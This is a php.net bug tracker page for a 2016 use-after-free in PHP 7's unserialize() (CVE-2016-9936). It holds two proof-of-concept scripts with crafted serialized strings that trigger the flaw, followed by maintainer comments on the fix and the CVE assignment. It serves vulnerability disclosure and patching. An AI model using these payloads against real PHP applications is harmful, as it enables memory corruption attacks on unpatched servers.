php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login

go to bug id or search bugs for

Sec Bug #72978 Use After Free in PHP7 unserialize()
Submitted: 2016-08-30 15:56 UTC Modified: 2016-12-13 11:52 UTC
From: taoguangchen at icloud dot com Assigned: stas (profile)
Status: Closed Package: *General Issues
PHP Version: 7.0.10 OS:
Private report: No CVE-ID: 2016-9936
View Developer Edit
Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If you forgot your password, you can retrieve your password here.
Password:
Status:
Package:
Bug Type:
Summary:
From: taoguangchen at icloud dot com
New email:
PHP Version: OS:

 

 [2016-08-30 15:56 UTC] taoguangchen at icloud dot com 
Description:
------------
PoC:
```
<?php

class obj1 implements Serializable {
    var $data;
    function serialize() {
        return serialize($this->data);
    }
    function unserialize($data) {
        $this->data = unserialize($data);
    }
}

class obj2 {
    var $ryat;
    function __wakeup() {
        $this->ryat = null;
    }
}

$inner = 's:4:"ryat";';
$exploit = 'a:2:{i:0;C:4:"obj1":'.strlen($inner).':{'.$inner.'}i:1;O:4:"obj2":1:{s:4:"ryat";R:3;}}';
$data = unserialize($exploit);
for ($i = 0; $i < 5; $i++) {
    $v[$i] = 'hi'.$i;
}
var_dump($data);

?>
```

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2016-09-22 15:31 UTC] taoguangchen at icloud dot com 
This bug can be triggered with CURLFile::__wakeup()

PoC:
```
<?php

class obj implements Serializable {
	var $data;
	function serialize() {
		return serialize($this->data);
	}
	function unserialize($data) {
		$this->data = unserialize($data);
	}
}

$inner = 's:4:"ryat";';
$exploit = 'a:2:{i:0;C:3:"obj":'.strlen($inner).':{'.$inner.'}i:1;O:8:"CURLFile":1:{s:4:"name";R:3;}}';
try {
	unserialize($exploit);
} catch (Exception $e) {
	var_dump($e->getMessage());
}
for ($i = 0; $i < 5; $i++) {
	$v[$i] = 'hi'.$i;
}

?>
```
 [2016-11-08 13:47 UTC] taoguangchen at icloud dot com 
I think this issue has been fixed in master/7.0:

https://github.com/php/php-src/commit/b2af4e8868726a040234de113436c6e4f6372d17
 [2016-11-16 06:20 UTC] stas@php.net
-Status: Open +Status: Closed -Assigned To: +Assigned To: stas
 [2016-11-16 06:20 UTC] stas@php.net 
The fix for this bug has been committed.

Snapshots of the sources are packaged every three hours; this change
will be in the next snapshot. You can grab the snapshot at
http://snaps.php.net/.

 For Windows:

http://windows.php.net/snapshots/
 
Thank you for the report, and for helping us make PHP better.

Closing accordingly.
 [2016-11-16 06:21 UTC] stas@php.net
-CVE-ID: +CVE-ID: needed
 [2016-11-16 06:21 UTC] stas@php.net 
Looks like needing a CVE since triggering code is pretty common.
 [2016-12-12 09:37 UTC] kaplan@php.net 
This issue isn't mentioned in 7.0.14 changelog.
 [2016-12-13 11:52 UTC] kaplan@php.net
-CVE-ID: needed +CVE-ID: 2016-9936
 [2016-12-13 11:52 UTC] kaplan@php.net 
se CVE-2016-9936. The b2af4e8868726a040234de113436c6e4f6372d17 commit
message is "Complete the fix of bug #70172 for PHP 7." Because 70172
is referenced by CVE-2015-6834, it is possible to say that
CVE-2016-9936 exists because of an incomplete fix for CVE-2015-6834.
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved. 		Last updated: Thu Nov 21 12:01:29 2024 UTC